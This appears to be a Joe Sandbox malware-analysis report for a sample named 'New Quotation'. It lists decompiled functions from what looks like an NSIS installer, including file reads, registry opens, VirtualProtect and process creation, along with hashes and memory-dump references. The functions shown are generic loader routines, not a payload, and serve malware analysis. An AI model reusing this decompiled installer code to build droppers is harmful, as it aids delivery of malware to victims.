                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                          • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                          • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                          • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004060B0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E004060B0(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                                                                                          0x004060b4
                                                                                                                                                                                          0x004060c4
                                                                                                                                                                                          0x004060cc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004060d3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004060d5

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                          • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                          • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                          • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 71092A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x71095048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x7109505c, 4, 0x40, 0x7109504c); // executed
					 *0x7109505c = 0xc2;
					 *0x7109504c = 0;
					 *0x71095054 = 0;
					 *0x71095068 = 0;
					 *0x71095058 = 0;
					 *0x71095050 = 0;
					 *0x71095060 = 0;
					 *0x7109505e = 0;
				}
				return 1;
			}



                                                                                                                                                                                          0x71092a88
                                                                                                                                                                                          0x71092a8d
                                                                                                                                                                                          0x71092a9d
                                                                                                                                                                                          0x71092aa5
                                                                                                                                                                                          0x71092aac
                                                                                                                                                                                          0x71092ab1
                                                                                                                                                                                          0x71092ab6
                                                                                                                                                                                          0x71092abb
                                                                                                                                                                                          0x71092ac0
                                                                                                                                                                                          0x71092ac5
                                                                                                                                                                                          0x71092aca
                                                                                                                                                                                          0x71092aca
                                                                                                                                                                                          0x71092ad2

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualProtect.KERNELBASE(7109505C,00000004,00000040,7109504C), ref: 71092A9D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49416621160.0000000071091000.00000020.00000001.01000000.00000004.sdmp, Offset: 71090000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49416572287.0000000071090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49416671437.0000000071094000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49416703508.0000000071096000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_71090000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                          • Opcode ID: de6ec29d265742ed1b27f0c5d52183fbcab5d7fb421dd4c6d3d78b3bc0557852
                                                                                                                                                                                          • Instruction ID: 9ea54fe0109ffc29aee4f0a8cecd7094d336d3356fe4958301618a2490b919fc
                                                                                                                                                                                          • Opcode Fuzzy Hash: de6ec29d265742ed1b27f0c5d52183fbcab5d7fb421dd4c6d3d78b3bc0557852
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DF0AEB2A09280DEC351CF3B84657093FF0B7C9704B25466BF288EA250F3364056EF95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004063AA Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E004063AA(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406329(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                                                                                                                                                          0x004063b4
                                                                                                                                                                                          0x004063bb
                                                                                                                                                                                          0x004063ce
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004063ce
                                                                                                                                                                                          0x004063bf
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406438,?,00000000,?,?,Call,?), ref: 004063CE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                          • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                                          • Instruction ID: 4361357c0318622cec318f667d88df30c4c29b75262f7bca7234b06b46464da2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 83D0123210020EBBDF115F91AD01FAB3B5DAB08310F014426FE06E40A1D775D530A764
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004044E5 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E004044E5(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x433ed8; // 0x10442
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                                                                                                                                                          0x004044e5
                                                                                                                                                                                          0x004044ec
                                                                                                                                                                                          0x004044f7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004044f7
                                                                                                                                                                                          0x004044fd

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(00010442,00000000,00000000,00000000), ref: 004044F7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                          • Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                                                                                                                          • Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
                                                                                                                                                                                          • Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                                                                                                                          • Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004044CE Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E004044CE(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
				return _t2;
			}




                                                                                                                                                                                          0x004044dc
                                                                                                                                                                                          0x004044e2

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                          • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                                                                                                                          • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                                                                                                                                                                          • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004034E5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E004034E5(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                                                                                                          0x004034f3
                                                                                                                                                                                          0x004034f9

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                          • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                          • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                                                                                                          • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004044BB Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E004044BB(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x42d264, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                          0x004044c5
                                                                                                                                                                                          0x004044cb

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                          • Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                                                                                                                          • Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
                                                                                                                                                                                          • Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                                                                                                                          • Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                          			E00401FA4() {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E0040559F(0xffffffeb, _t7); // executed
				_t9 = E00405B20(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E004069B5(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E00406484( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                                                                                                                                                                                          0x00401faa
                                                                                                                                                                                          0x00401faf
                                                                                                                                                                                          0x00401fb5
                                                                                                                                                                                          0x00401fba
                                                                                                                                                                                          0x00401fbe
                                                                                                                                                                                          0x0040292e
                                                                                                                                                                                          0x00401fc4
                                                                                                                                                                                          0x00401fc7
                                                                                                                                                                                          0x00401fca
                                                                                                                                                                                          0x00401fd2
                                                                                                                                                                                          0x00401fe1
                                                                                                                                                                                          0x00401fe3
                                                                                                                                                                                          0x00401fe3
                                                                                                                                                                                          0x00401fd4
                                                                                                                                                                                          0x00401fd8
                                                                                                                                                                                          0x00401fd8
                                                                                                                                                                                          0x00401fd2
                                                                                                                                                                                          0x00401fea
                                                                                                                                                                                          0x00401feb
                                                                                                                                                                                          0x00401feb
                                                                                                                                                                                          0x00402c2d
                                                                                                                                                                                          0x00402c39

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,00000000,00425A20,753623A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                                                                                            • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,00000000,00425A20,753623A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                                                                                            • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                                                                                            • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll), ref: 0040560C
                                                                                                                                                                                            • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                                                                                            • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                                                                                            • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                                                                                            • Part of subcall function 00405B20: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000,00000000), ref: 00405B49
                                                                                                                                                                                            • Part of subcall function 00405B20: CloseHandle.KERNEL32(?), ref: 00405B56
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                                                                                                                            • Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
                                                                                                                                                                                            • Part of subcall function 004069B5: GetExitCodeProcess.KERNEL32(?,?), ref: 004069E8
                                                                                                                                                                                            • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2972824698-0
                                                                                                                                                                                          • Opcode ID: 7b3da9c5f3f1b41421eabd7b64724d9f8300048c1db74a1cfd06f9463eb6dfe6
                                                                                                                                                                                          • Instruction ID: a015d294fcb9cc4e365613bb9e09bf6e78b00889af70ee47f703a6c6056ea9c8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b3da9c5f3f1b41421eabd7b64724d9f8300048c1db74a1cfd06f9463eb6dfe6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DF09072904112EBCB21BBA59A84EDE76E8DF01318F25403BE102B21D1D77C4E429A6E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402D84(_t7);
				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}







                                                                                                                                                                                          0x004014d7
                                                                                                                                                                                          0x004014d8
                                                                                                                                                                                          0x004014e1
                                                                                                                                                                                          0x004014e4
                                                                                                                                                                                          0x004014e8
                                                                                                                                                                                          0x004014e8
                                                                                                                                                                                          0x004014ea
                                                                                                                                                                                          0x00402c2d
                                                                                                                                                                                          0x00402c39

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
